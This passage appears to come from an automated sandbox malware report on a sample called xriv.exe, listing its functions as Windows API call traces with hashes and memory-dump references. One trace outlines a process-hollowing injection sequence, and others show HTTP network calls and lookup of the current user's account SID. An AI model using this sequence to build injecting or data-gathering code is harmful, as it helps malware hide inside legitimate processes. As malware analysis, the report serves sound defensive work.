                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 001739BE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 001739C5
                                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 001739ED
                                                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00173A0E
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00173A5A
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 00173A96
                                                          • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00173AB2
                                                          • ResumeThread.KERNEL32(?,?,?,00000000), ref: 00173ABE
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 00173ACC
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00173AED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                          • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                          • API String ID: 4033543172-1522589568
                                                          • Opcode ID: 7a46256a5bcb224ebe4f7ffac2c4bc985c6a1802b51ffd1ad3d40286e662abc1
                                                          • Instruction ID: f842eb23c623f733e5c6c81335e5c7024779fa449038d1272313174a841eee8c
                                                          • Opcode Fuzzy Hash: 7a46256a5bcb224ebe4f7ffac2c4bc985c6a1802b51ffd1ad3d40286e662abc1
                                                          • Instruction Fuzzy Hash: 3B515D71640218AFDB21DF54DC4ABEAB7B8FF08701F144096F649AA590D7B2AA90CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetOpenW.WININET(001A3F6C,00000000,00000000,00000000,00000000), ref: 0017871C
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00178740
                                                          • HttpOpenRequestA.WININET(?,00000000), ref: 0017878A
                                                          • HttpSendRequestA.WININET(?,00000000), ref: 0017884A
                                                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 001788FC
                                                          • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 001789B0
                                                          • InternetCloseHandle.WININET(?), ref: 001789D7
                                                          • InternetCloseHandle.WININET(?), ref: 001789DF
                                                          • InternetCloseHandle.WININET(?), ref: 001789E7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                          • String ID:
                                                          • API String ID: 1354133546-0
                                                          • Opcode ID: 6e09f7f2c4adaa3db8c8b0a72ef77698a78ec288980516f63eb840363bd6bd83
                                                          • Instruction ID: 01d7a44be0a1f32421fc51c5334ad7977e9fce7b73b14e82e14cdfa9b1bb6882
                                                          • Opcode Fuzzy Hash: 6e09f7f2c4adaa3db8c8b0a72ef77698a78ec288980516f63eb840363bd6bd83
                                                          • Instruction Fuzzy Hash: C8C1E1B1A101189BEB28DF28CC88BADBB75EF55304F5081A9F50D97291DB719BC0CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$InformationTimeZone
                                                          • String ID:
                                                          • API String ID: 597776487-0
                                                          • Opcode ID: 04df01611913ea430e6d2a8491219866604c3ec2db47d881fc8c5336a7e4b38f
                                                          • Instruction ID: 7b4f982e724ece59c581138f35f666abdd52334180569f1fb6ca2673adf6f177
                                                          • Opcode Fuzzy Hash: 04df01611913ea430e6d2a8491219866604c3ec2db47d881fc8c5336a7e4b38f
                                                          • Instruction Fuzzy Hash: 16C13871E00205AFDF25AF68CC55AAABBF9EF56310F54015AF461D7282E7308F41CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00187B12
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: 97fc77e52dbaa3ee078f65ad2df91bf732c241346671a76fcafe428ec58bfceb
                                                          • Instruction ID: 38f77f277944127ef512c3ff29e55f8150a2289e3593d7c860a62d03380dcdee
                                                          • Opcode Fuzzy Hash: 97fc77e52dbaa3ee078f65ad2df91bf732c241346671a76fcafe428ec58bfceb
                                                          • Instruction Fuzzy Hash: 9D515CB1A04216CBDB25CF69D9857AEB7F1FB48310F24896AD406EB790D774DA80CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00173132
                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00173147
                                                          • HeapAlloc.KERNEL32(00000000), ref: 0017314A
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00173158
                                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0017317B
                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00173186
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00173189
                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00173199
                                                          • HeapAlloc.KERNEL32(00000000), ref: 0017319C
                                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 001731C6
                                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 001731D9
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001732D5
                                                          • HeapFree.KERNEL32(00000000), ref: 001732DE
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001732E3
                                                          • HeapFree.KERNEL32(00000000), ref: 001732E6
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001732ED
                                                          • HeapFree.KERNEL32(00000000), ref: 001732F0
                                                          • LocalFree.KERNEL32(00000000), ref: 001732F5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                          • String ID:
                                                          • API String ID: 3326663573-0
                                                          • Opcode ID: a35938aca4163fa8474e207e4bb68b11e0ba5c2fbe137d7c32696f41c8155a9f
                                                          • Instruction ID: c82a6e10232c7c9425ed0ba03e745cb3560590fbcc9eb95b4107840a6bb7fbbd
                                                          • Opcode Fuzzy Hash: a35938aca4163fa8474e207e4bb68b11e0ba5c2fbe137d7c32696f41c8155a9f
                                                          • Instruction Fuzzy Hash: 557172B1E00209AFDB14DFA4DC89BAFBBB8FF44300F14851AF915A7281DB749A45CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 00191705
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 001912BB
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 001912CD
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 001912DF
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 001912F1
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191303
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191315
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191327
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191339
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 0019134B
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 0019135D
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 0019136F
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191381
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191393
                                                          • _free.LIBCMT ref: 001916FA
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 0019171C
                                                          • _free.LIBCMT ref: 00191731
                                                          • _free.LIBCMT ref: 0019173C
                                                          • _free.LIBCMT ref: 0019175E
                                                          • _free.LIBCMT ref: 00191771
                                                          • _free.LIBCMT ref: 0019177F
                                                          • _free.LIBCMT ref: 0019178A
                                                          • _free.LIBCMT ref: 001917C2
                                                          • _free.LIBCMT ref: 001917C9
                                                          • _free.LIBCMT ref: 001917E6
                                                          • _free.LIBCMT ref: 001917FE
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: f75c1e0e3e474880cd78b6fd3bea38bae0b30d227e3a768090d22062b217b5f6
                                                          • Instruction ID: 64fe9be8bbece1139b09847ab978bb3aec10a7686827d538d84da6aa9ee23ca3
                                                          • Opcode Fuzzy Hash: f75c1e0e3e474880cd78b6fd3bea38bae0b30d227e3a768090d22062b217b5f6
                                                          • Instruction Fuzzy Hash: C6314C35600307AFEF25AEB9E845B5A73E9AF10750F64842AF459D7191EF70AEC0CB24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00188CC2
                                                          • type_info::operator==.LIBVCRUNTIME ref: 00188CE9
                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00188DF5
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00188ED0
                                                          • _UnwindNestedFrames.LIBCMT ref: 00188F57
                                                          • CallUnexpected.LIBVCRUNTIME ref: 00188F72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 2123188842-393685449
                                                          • Opcode ID: 1ad1391190da69a85a35bf28da5e9e2b8ed4de83f6ad3c585741270c3d253052
                                                          • Instruction ID: 32152ed2baec11adf39e76d556fc20a774f80e08bda07b20355c5592db4c82bf
                                                          • Opcode Fuzzy Hash: 1ad1391190da69a85a35bf28da5e9e2b8ed4de83f6ad3c585741270c3d253052
                                                          • Instruction Fuzzy Hash: F7C14B71800209EFCF29FF94D8819AEBBB5BF24310F94455AE815AB252DB31DB51CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0018DE42
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 0018DE4E
                                                          • _free.LIBCMT ref: 0018DE59
                                                          • _free.LIBCMT ref: 0018DE64
                                                          • _free.LIBCMT ref: 0018DE6F
                                                          • _free.LIBCMT ref: 0018DE7A
                                                          • _free.LIBCMT ref: 0018DE85
                                                          • _free.LIBCMT ref: 0018DE90
                                                          • _free.LIBCMT ref: 0018DE9B
                                                          • _free.LIBCMT ref: 0018DEA9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c9eadde83fd202b908992afe5b6e58af79a564afdc35989d0e75a476b1afdf7d
                                                          • Instruction ID: 4b627d99e31cf64fc3c536f42644743640bcfb2a5eba7e326e9b4ba15f12708e
                                                          • Opcode Fuzzy Hash: c9eadde83fd202b908992afe5b6e58af79a564afdc35989d0e75a476b1afdf7d
                                                          • Instruction Fuzzy Hash: A521B67690420DAFCB01EF94D881DDE7BB9BF18740B5081A6F6199B161EB71EB84CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57efc23b4e29317a9de391637d0cd73011edad85a1f89b8c1fc195e1451e8222
                                                          • Instruction ID: 0017fb8887b384d0196ce160c825324003e00269b15928a80f556730cd749a69
                                                          • Opcode Fuzzy Hash: 57efc23b4e29317a9de391637d0cd73011edad85a1f89b8c1fc195e1451e8222
                                                          • Instruction Fuzzy Hash: E4C1F171E04649EFEF16DF99C880BAEBBB2AF59314F144059E505AB392C7309A81CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 3409252457-0
                                                          • Opcode ID: 3ee45ce07e56e285b40f6bb273311f8633759f17d448ff5808568e08beb269d8
                                                          • Instruction ID: 2c058718565253f54cae0acf16be6f78512b382cd8048863e5b6db4fda028476
                                                          • Opcode Fuzzy Hash: 3ee45ce07e56e285b40f6bb273311f8633759f17d448ff5808568e08beb269d8
                                                          • Instruction Fuzzy Hash: 7F514870D44345AFDF22BFB89881A6D7BF4EF09714F1042AEF91597281EB319A80CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 001885A7
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 001885AF
                                                          • _ValidateLocalCookies.LIBCMT ref: 00188638
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00188663
                                                          • _ValidateLocalCookies.LIBCMT ref: 001886B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: b85e8a3e806bb793cc8a4ac79f178dd93a669427a8b53a46c27ee7763ca83814
                                                          • Instruction ID: b54929deed32a03bf7ded0de3e8fcee083f649701bac28419416819c0c35aa71
                                                          • Opcode Fuzzy Hash: b85e8a3e806bb793cc8a4ac79f178dd93a669427a8b53a46c27ee7763ca83814
                                                          • Instruction Fuzzy Hash: A441D734A00218EBCF10FF68C884AAEBBB5EF55324F648155E8159B392EB31DB05CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 0-537541572
                                                          • Opcode ID: 0b06f1b08ddedca378ce9d62fea00c6da14a9d683ac98b172f0afeaabfc31062
                                                          • Instruction ID: 1aa24f85ebbaff58359312b74408551674b74af23792a0fcbcbd721f094fe11d
                                                          • Opcode Fuzzy Hash: 0b06f1b08ddedca378ce9d62fea00c6da14a9d683ac98b172f0afeaabfc31062
                                                          • Instruction Fuzzy Hash: 0121E772A41220BBEB35AB68DC45A5E37DE9F557A0F250225FD06A7690D730EF008FE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00191405: _free.LIBCMT ref: 0019142A
                                                          • _free.LIBCMT ref: 0019148B
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 00191496
                                                          • _free.LIBCMT ref: 001914A1
                                                          • _free.LIBCMT ref: 001914F5
                                                          • _free.LIBCMT ref: 00191500
                                                          • _free.LIBCMT ref: 0019150B
                                                          • _free.LIBCMT ref: 00191516
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                          • Instruction ID: c49994700b5adf867bde0ffc77d996a7c6704759e52649efabf60b92dd350af0
                                                          • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                          • Instruction Fuzzy Hash: 45118472540709B6DB20BFB1DC07FCB77AC9F14701F414815B29DAB092E728B685CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetConsoleCP.KERNEL32(?,00175140,00000000), ref: 00192B40
                                                          • __fassign.LIBCMT ref: 00192D1F
                                                          • __fassign.LIBCMT ref: 00192D3C
                                                          • WriteFile.KERNEL32(?,00175140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00192D84
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00192DC4
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00192E70
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                          • String ID:
                                                          • API String ID: 4031098158-0
                                                          • Opcode ID: 957392c89d5abce464096c0d1765a1c8d4e231d0522405a1dbfd59374b4e7f6a
                                                          • Instruction ID: 712793390fb2478fa1fc80df1ea39aa72efccfddc89344b2016c28490bb1a37f
                                                          • Opcode Fuzzy Hash: 957392c89d5abce464096c0d1765a1c8d4e231d0522405a1dbfd59374b4e7f6a
                                                          • Instruction Fuzzy Hash: 56D16A75D00258AFCF15CFA8C8809EDBBB5BF49314F28416AE856BB252D731AE46CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00188887,00188476,00187AC4), ref: 0018889E
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001888AC
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001888C5
                                                          • SetLastError.KERNEL32(00000000,00188887,00188476,00187AC4), ref: 00188917
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: abb7cc7b063b5d7207de943353a356ad4da009fdf729c73ed519e1b19a97227f
                                                          • Instruction ID: b290cc6e1cc0bc4f6a6e7a2de8f3ac274c004a37e06f484062357b9a9e56d6dc
                                                          • Opcode Fuzzy Hash: abb7cc7b063b5d7207de943353a356ad4da009fdf729c73ed519e1b19a97227f
                                                          • Instruction Fuzzy Hash: 7201F732A1A7115FA7293B74AC85A3B2794EF527F4760022AF520428E1EF214E445F81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 00190033
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
